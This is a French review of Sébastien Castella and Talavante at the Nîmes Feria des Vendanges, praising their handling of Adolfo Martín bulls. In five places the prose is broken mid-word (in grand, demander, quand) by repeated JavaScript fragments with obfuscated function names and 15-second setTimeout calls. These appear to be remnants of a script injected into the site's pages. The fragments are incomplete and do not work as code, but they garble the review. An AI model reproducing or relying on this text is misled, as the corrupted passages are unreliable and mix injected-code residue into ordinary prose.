CASTELLA ET TALAVANTE TORÉER N’EST PAS SEULEMENT FAIRE DES PASSES

Nîmes, feria des Vendanges. Si vous rajoutez de l’intelligence intuitive à du courage serein vous pourrez y trouver les clés du toreo. Lors de la dernière feria des Vendanges de Nîmes j’ai vu comment deux toreros les révélaient au grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and public.

L’un d’eux, Sébastien Castella associa toutes ces qualités pour découvrir les charges secrètes que les toros d’Adolfo Martín –sauf le troisième- gardaient sous clé. Le Biterrois ouvrit la porte de leurs charges grâce à un placement parfait et à une subtilité sans pareil pour présenter les leurres. Il parvint ainsi à ce que des toros brusques glissent en douceur, que d’autres collés au sol se laissent porter et même que des toros réservés et avisés finissent par se mouvoir avec noblesse. Modifier le comportement des toros, les transformer en ce qu’ils n’étaient pas, c’est le maximum que l’on peut demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ander à un torero. Sa prestation fut mémorable à l’exception de son maniement des épées. Il les a tous tués à l’inverse de la manière dont il les avait toréés. Mais quel torero immense à la muleta !

En ce qui concerne l’autre torero, Talavante, les difficultés l’inspirent. Si la charge est courte, il l’achève vers l’intérieur et la prolonge ; si le toro l’attend, il fait un pas en avant et la charge s’allonge ; si le toro est aimanté au leurre, il ne lui enlève jamais la muleta du museau ; si le toro doute, il change de corne ;  et quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and il maîtrise la volonté de l’animal, il le laisse s’approcher, flairer avec ses cornes de haut en bas son costume. Et tout cela il le fait avec plaisir, il le savoure, avec une esthétique de son propre cru et une assise étonnante. Quel grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and torero !

Les commentaires sont fermés.